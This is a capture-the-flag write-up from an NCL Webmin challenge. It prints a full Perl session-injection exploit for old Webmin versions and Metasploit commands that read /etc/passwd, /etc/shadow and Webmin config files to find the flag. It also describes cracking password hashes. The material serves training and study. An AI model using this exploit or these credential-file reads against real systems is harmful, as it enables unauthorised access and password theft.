NCL Exploit 2: Webmin Writeup

This one was fun. The challenge was titled Exploit 2 with the task of finding the flag on the system. A quick nmap scan with service detection showed a Webmin console running on port 10000. I tried searching for a default password for default webmin login but it reads from shadow. I decided to look into webmin vulns next. A quick google search uncovered a remote command execution vuln! Hallelujah! I found the following exploit code.

#!/usr/bin/perl
#
# Exploit for Webmin 1.050 - 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt \n\n";

$nc="/usr/bin/nc";

if($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
    print "netcat not found!\n";
    exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session\_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";

Escalating to admin looks good. Unfortunately, the exploit didn't seem to be working when I plugged the correct cookie values into Firefox. So I kept looking... Metasploit module for file disclosure: auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting    Required  Description
   ----     ---------------    --------  -----------
   DIR      /unauthenticated   yes       Webmin directory path
   Proxies                     no        Use a proxy chain
   RHOST    54.221.*.*         yes       The target address
   RPATH    /etc/passwd        yes       The file to download
   RPORT    10000              yes       The target port
   VHOST                       no        HTTP server virtual host

Let's try it out...

msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
[*] Auxiliary module execution completed

HELL YES. But just to make sure we can get to ANY file...

msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit

Sure enough, the whole shadow file was dumped. There was one user with a hash: ubuntu. I took that attack vector, I started cracking it. SSH was also open on the machine, but unfortunately it only accepted authorized_keys. I stopped the crack, saved the hash for later, and continued my search for the flag. The problem here is that directories cannot be listed, so we need to know what files to look in. I thought that maybe they had left their SSH keys lying around so I looked in /home/ubuntu/.ssh/ for id_rsa and id_dsa but no such luck. I searched around the internet for important webmin files and I found /etc/webmin/miniserv.conf. In this file there was the location of a users file...

session=1
<b>userfile=/etc/webmin/miniserv.users</b>
keyfile=/etc/webmin/miniserv.pem
passwd\_file=/etc/shadow

Looking in that file gave me back a user named 'admin' and a corresponding hash! I started cracking again. In the mean time I wanted to find out more information about the webmin install. I ran across the path to a logfile: /var/webmin/webmin.log So I ran the module:

msf auxiliary(file_disclosure) > set RPATH /var/webmin/webmin.log
RPATH => /var/webmin/webmin.log
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /var/webmin/webmin.log...
[*] The server returned: 200 Document follows
1412056349.16448.0 [30/Sep/2014 05:52:29] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 69.243.41.246 shell index.cgi "run" "-" "-" cmd
='ls'
1412056361.16443.0 [30/Sep/2014 05:52:41] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 69.243.41.246 shell index.cgi "run" "-" "-" cmd
='echo ls'
...
1412058045.17086.0 [30/Sep/2014 06:20:45] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='cat flag.php'
1412058064.17085.0 [30/Sep/2014 06:21:04] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='find / -name flag.php'
1412058074.17133.0 [30/Sep/2014 06:21:14] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='cat <strong>/var/www/flag.php</strong>'

YES! That looks good... Now to look in that file...

msf auxiliary(file_disclosure) > set RPATH /var/www/flag.php
RPATH => /var/www/flag.php
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /var/www/flag.php...
[*] The server returned: 200 Document follows
<? // THIS IS THE RRAL FLAG FOR THIS SYSTEM: <strong>NCL-OSSL-1337</strong> FLAG FLAG FLAG ?>;
[*] Auxiliary module execution completed

Got it, NCL-OSSL-1337.